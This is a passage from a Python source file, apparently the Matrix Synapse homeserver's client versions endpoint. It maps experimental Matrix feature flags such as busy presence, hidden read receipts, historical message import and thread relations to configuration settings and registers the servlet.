"io.element.e2ee_forced.private": self.e2ee_forced_private,
"io.element.e2ee_forced.trusted_private": self.e2ee_forced_trusted_private,
# Supports the busy presence state described in MSC3026.
"org.matrix.msc3026.busy_presence": self.config.experimental.msc3026_enabled,
# Supports receiving hidden read receipts as per MSC2285
"org.matrix.msc2285": self.config.experimental.msc2285_enabled,
# Adds support for importing historical messages as per MSC2716
"org.matrix.msc2716": self.config.experimental.msc2716_enabled,
# Adds support for jump to date endpoints (/timestamp_to_event) as per MSC3030
"org.matrix.msc3030": self.config.experimental.msc3030_enabled,
# Adds support for thread relations, per MSC3440.
"org.matrix.msc3440": self.config.experimental.msc3440_enabled,
},
},
)
def register_servlets(hs: "HomeServer", http_server: HttpServer) -> None:
VersionsRestServlet(hs).register(http_server)
| matrix-org/synapse | synapse/rest/client/versions.py | Python | apache-2.0 | 4,936 |
Subsets and Splits